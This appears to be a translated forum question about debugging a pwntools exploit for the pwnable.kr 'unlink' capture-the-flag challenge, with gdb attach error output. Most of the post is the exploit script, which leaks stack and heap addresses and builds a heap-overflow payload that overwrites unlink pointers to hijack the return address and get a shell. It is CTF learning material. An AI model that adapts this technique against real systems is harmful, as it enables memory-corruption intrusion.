是否可以调试 pwnable.kr 挑战?
[英]Is it possible to debug pwnable.kr challenges?
问题描述
在过去的几天里,我试图解决 pwnable.kr 中的“取消链接”挑战,我正在努力使用 pwntools 在服务器上远程和本地附加一个调试器(代码添加在下面)。
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
exe = context.binary = ELF('unlink_local')
host = args.HOST or 'pwnable.kr'
port = int(args.PORT or 2222)
user = args.USER or 'unlink'
password = args.PASSWORD or 'guest'
remote_path = '/home/unlink/unlink'
# Connect to the remote SSH server
shell = None
if not args.LOCAL:
shell = ssh(user, host, port, password)
shell.set_working_directory(symlink=True)
def start_local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
def start_remote(argv=[], *a, **kw):
'''Execute the target binary on the remote host'''
if args.GDB:
return gdb.debug([remote_path] + argv, gdbscript=gdbscript, ssh=shell, *a, **kw)
else:
return shell.process([remote_path] + argv, *a, **kw)
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return start_local(argv, *a, **kw)
else:
return start_remote(argv, *a, **kw)
gdbscript = '''
tbreak main
continue
'''.format(**locals())
r = start()
stack_leak = r.recvline(keepends=False)
stack_leak = int(stack_leak.decode("latin-1").split(": ")[1], 16)
heap_leak = r.recvline(keepends=False)
heap_leak = int(heap_leak.decode("latin-1").split(": ")[1], 16)
ret_addr_on_stack = stack_leak + 0x28 # 0x28 is the offset between the leak and the return address location on
# the stack (checked in gdb via running the program multiple times and checking the offset)
shellcode_location_on_heap = heap_leak + 0x50
"""
Payload layout (in this exact order)
"""
A_buf = b"A" * 8 # A's buf variable (in the struct 'tagOBJ' in the source) overflow
B_prev_size = b"B" * 4 # B's prev_size variable (in malloc internals) overflow
B_size = b"C" * 4 # B's size variable (in malloc internals) overflow
B_fd = p32(ret_addr_on_stack - 0x4) # B's fd pointer (in the struct 'tagOBJ') overflow
B_bk = p32(shellcode_location_on_heap) # 0x080484eb # B's bk pointer (in the struct 'tagOBJ') overflow ----- shell() function address
B_buf = b"D" * 8 # B's buf variable (in the struct 'tagOBJ') overflow
C_prev_size = b"E" * 4 # B's prev_size variable (in malloc internals) overflow
C_size = b"F" * 4 # B's size variable (in malloc internals) overflow
C_fd = b"PPPP" # C's fd pointer (in the struct 'tagOBJ') overflow ----- empty (doesn't point anywhere)
C_bk = b"LLLL" # C's bk pointer (in the struct 'tagOBJ') overflow ----- RET ADDRESS LOCATION ON STACK
payload = A_buf + B_prev_size + B_size + B_fd + B_bk + B_buf + C_prev_size + C_size + C_fd + C_bk
with open("inp", "wb") as f:
f.write(payload)
r.sendlineafter(b'now that you have leaks, get shell!\n', payload)
r.interactive()
当我使用 pwntools远程附加 gdb 时,我从服务器收到以下错误消息:
[DEBUG] Received 0x8f bytes:
'/build/gdb-9un5Xp/gdb-7.11.1/gdb/gdbserver/regcache.c:264:\n'
'A problem internal to GDBserver has been detected.\n'
'Unknown register ymm0h requested\n'
此外,当我使用 pwntools 和 tmux在服务器上本地附加 gdb 时(因为没有 tmux 它找不到终端来打开 gdb,我不知道为什么),我收到此错误:
Attaching to program: /home/unlink/unlink, process 50201
Could not attach to process. If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user. For more details, see /etc/sysctl.d/10-ptrace.conf
ptrace: Operation not permitted.
/tmp/tal/50201: No such file or directory.
Breakpoint 1 at 0x804851e
(gdb)
当通过没有 pwntools 的 pid 附加到进程时会发生同样的错误(通过 gdb -p {pid})。
我会指出我试图在我的电脑上运行程序(而不是在他们的服务器上),并且堆布局不同(我认为 malloc 对齐到 16 个字节而不是 4 个字节?不知道为什么它不同老实说) ,所以在本地运行是行不通的。
请注意,我意识到这个漏洞不能正常工作,我的问题是我不知道如何正确调试它,所以请避免对漏洞本身进行更正。
提示将不胜感激:)
0 个解决方案
ReadTheDocs 的挑战
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.